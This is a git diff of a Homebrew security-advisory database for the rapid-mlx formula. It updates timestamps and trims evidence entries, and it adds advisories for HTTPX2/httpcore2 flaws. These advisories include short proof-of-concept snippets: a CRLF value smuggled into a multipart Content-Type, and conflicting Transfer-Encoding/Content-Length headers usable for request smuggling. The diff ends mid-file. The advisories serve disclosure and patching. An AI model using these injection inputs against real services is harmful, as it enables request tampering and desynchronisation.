"key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48526.json b/advisories/BREW-rapid-mlx-CVE-2026-48526.json index ff93a001883..f171f633565 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48526.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48526", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48710.json b/advisories/BREW-rapid-mlx-CVE-2026-48710.json index 999b4ac9d95..7768c84adeb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48710.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48710", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-29T09:37:10Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48817.json b/advisories/BREW-rapid-mlx-CVE-2026-48817.json index 9eab4cbc62f..533f4e1449e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48817.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48817", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48818.json b/advisories/BREW-rapid-mlx-CVE-2026-48818.json index 8abacfbe708..35bf0ade706 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48818.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48818", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-5241.json b/advisories/BREW-rapid-mlx-CVE-2026-5241.json index 24ceb8af17a..9383d97ce8b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-5241.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-5241.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-5241", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fgcw-684q-jj6r", "CVE-2026-5241", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-52869.json b/advisories/BREW-rapid-mlx-CVE-2026-52869.json index 5a66988e8b7..b79b32198af 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-52869.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-52869", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-52870.json b/advisories/BREW-rapid-mlx-CVE-2026-52870.json index 993f55be73a..60b6b059152 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-52870.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-52870", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53537.json b/advisories/BREW-rapid-mlx-CVE-2026-53537.json index 5881f72b228..cc5d83f0135 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53537.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53537", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53538.json b/advisories/BREW-rapid-mlx-CVE-2026-53538.json index f96f148c7a3..033d64abd98 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53538.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53538", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53539.json b/advisories/BREW-rapid-mlx-CVE-2026-53539.json index d8e3f868c59..71f5cb9e425 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53539.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53539", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53540.json b/advisories/BREW-rapid-mlx-CVE-2026-53540.json index c9e7035cdd7..1a6c9590670 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53540.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53540", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-54282.json b/advisories/BREW-rapid-mlx-CVE-2026-54282.json index 3be5886199e..56f6699218e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-54282.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-54282", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-54283.json b/advisories/BREW-rapid-mlx-CVE-2026-54283.json index f4832114700..2a074e19e76 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-54283.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-54283", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-59950.json b/advisories/BREW-rapid-mlx-CVE-2026-59950.json index d083993f3a4..67dc2096b22 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-59950.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-59950", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84378.json b/advisories/BREW-rapid-mlx-CVE-2026-84378.json new file mode 100644 index 00000000000..bc5a327c86f --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84378", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.8" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84379.json b/advisories/BREW-rapid-mlx-CVE-2026-84379.json new file mode 100644 index 00000000000..51012c828f6 --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84379", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.15" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84380.json b/advisories/BREW-rapid-mlx-CVE-2026-84380.json new file mode 100644 index 00000000000..642047d2651 --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84380", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.15" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84381.json b/advisories/BREW-rapid-mlx-CVE-2026-84381.json new file mode 100644 index 00000000000..27c2abc82ab --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84381", + "published": "2026-09-10T20:37:32Z", + "modified": "2026-09-10T20:37:32Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.8" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84382.json b/advisories/BREW-rapid-mlx-CVE-2026-84382.json new file mode 100644 index 00000000000..9f24962e2d5 --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84382", + "published": "2026-09-10T20:37:33Z", + "modified": 